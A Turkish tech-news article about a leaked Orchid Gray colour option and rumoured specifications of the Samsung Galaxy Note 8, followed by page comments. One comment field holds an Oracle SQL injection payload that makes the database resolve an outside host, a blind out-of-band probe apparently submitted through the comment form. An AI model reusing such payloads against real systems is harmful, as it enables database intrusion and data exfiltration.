Galaxy Note 8'e Bir Yeni Renk Daha!

Samsung, bugün New York'ta düzenleyeceği etkinlik kapsamında yeni amiral gemisi Galxy Note 8'i tanıtacak. Tanıtıma saatler kala Galaxy Note 8'in yeni renk seçeneği ortaya çıktı!
23 Ağustos 2017 09:34
Galaxy Note 8e Bir Yeni Renk Daha!
Samsung'un Galaxy Note 8'i tanıtmasına 24 saatten kısa bir süre kaldı ve olaylı Galaxy Note 7'nin ardından nasıl bir cihazla karşılaşacağımızı herkes merakla bekliyor. Bizim kadar meraklı olmayan kişilerden biri de Evan Blass olsa gerek. Zira kendisinden Galaxy Note 8 ile ilgili yeni bir sızıntı daha geldi.
 
 
İşte Orkide Grisi Galaxy Note 8!
 
Evan Blass'ın ortaya çıkardığı görselle birlikte Samsung'un Galaxy Note 8 modeli için yeni bir renk seçeneği daha belirlediği öğrenilmiş oldu. Orchid Gray yeni Orkide Grisi adı verilen bu yeni modelin görseliyle birlikte cihazın bazı özellikleri de neredeyse kesinleşti.
 
 
 
 
Yukarıdaki görselde görebileceğiniz üzere Galaxy Note 8'in arka yüzünde yer alan ana kameranın sağında bir parmak izi okuyucu yer alıyor. Ayrıca bu bölgede iki objektif ve çift LED flaş da bulunuyor.
 
Bu bilgilerin dışında henüz kesinleşmese de Galaxy Note 8'in 6.3 inç'lik Super AMOLED ekrana, Snapdragon 835 ve ABD dışında Exynos 8895 işlemciye, 6 GB belleğe ve son olarak da 64 GB'lık dahili hafızaya sahip olacağı düşünülüyor.
 
shiftdelete
380812
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
23 Ağustos 2017, Çarşamba 09:45
hiç beğenmedim bu rengi
Bu haberler ilginizi çekebilir